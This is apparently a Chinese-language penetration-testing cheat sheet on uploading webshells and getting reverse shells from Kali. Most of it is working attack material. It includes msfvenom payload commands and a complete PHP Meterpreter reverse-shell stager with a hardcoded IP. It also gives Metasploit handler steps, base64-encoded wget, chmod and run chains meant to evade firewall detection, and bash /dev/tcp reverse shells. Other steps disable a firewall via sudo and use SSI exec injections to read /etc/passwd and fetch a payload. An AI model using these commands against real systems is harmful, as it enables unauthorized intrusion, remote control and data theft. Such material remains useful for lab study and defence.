上传webshell
生成webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw > /root/Desktop/shell.php
windows 靶机msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.100.4 lport=4444 -f exe >2.exe
使用burpsuite将shell.php上传(上面jpg改格式的都会吧)
反弹shell1
制作监听脚本PHP
msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw
然后你会得到一大串东西
/*<?php /**/ error_reporting(0); $ip = '172.16.101.13'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
截取留下下面这些传上去(注:这是我自己的IP生成的,不要傻乎乎的拿去用!)
<?php /**/ error_reporting(0); $ip = '172.16.101.13'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
然后设置监听服务
msfconsole
msf>use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost kail的IP
set lport 监听端口
run
然后上传你的php
然后运行你上传的php
http://IP/././你上传的php
反弹shell2
通过base64绕过防火墙检测
service apache2 start
echo 'wget http://kail的IP/shell -O/tmp/shell' |base64
echo 'chmod 777 /tmp/shell' |base64
echo '/tmp/shell' |base64
(执行代码都会产生一行字符串不要手抖关闭终端,不然重新打吧)
使用burpsuite修改内容(都用过吧kail的网页上传php经常用的)
"<?php shell exec(base64_decode('上面生成的字符串'));die();?>.php"
记得按顺序不然重新来
成功后就进入meterpreter
反弹shell3
开启监听
nc -nlvp 监听端口
如果存在命令执行就执行
echo 'bash -i>& /dev/tcp/kail的IP/监听端口/ 0 >&1' |bash
echo命令脱shell处理
echo os.system('/bin/sh')
直接将用户提权至可使用命令
john:~$ ls
john:~$ ls
啥都不显示
$echo os.system('/bin/sh')
john@loacl:ls
1 2 3.sh
python交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
反弹shell4
如果存在命令执行
ls -alh /home/用户名 显示详细用户的信息
ssh 用户名@localhost sudo -l 查看用户sudo命令的权限
ssh 用户名@localhost sudo ufw disable 关闭防火墙,要有root权限
启动监听端口
nc -nlvp 监听端口
ssh 用户名@loaclhost bash -i >& /dev/tcp/kail的ip/监听端口 0 >&1
反弹shell5
ssl注入
发现.shtml
<!--#exec cmd="cat /etc/passwd" --> (查看passwd)
<!--#exec cmd="cd /root/" --> (切换目录)
msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw > /root/shell.py
开启监听
msfconsole
msf>use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost kail的IP
set lport 监听端口
run
<!--#exec cmd="wget http://kail的ip/shell.py"--> (上传脚本)
<!--#exec cmd="chmod 777 shell.py"--> (给脚本加权限)
<!--#exec cmd="Python shell.py"--> (运行脚本)
成功后就进入meterpreter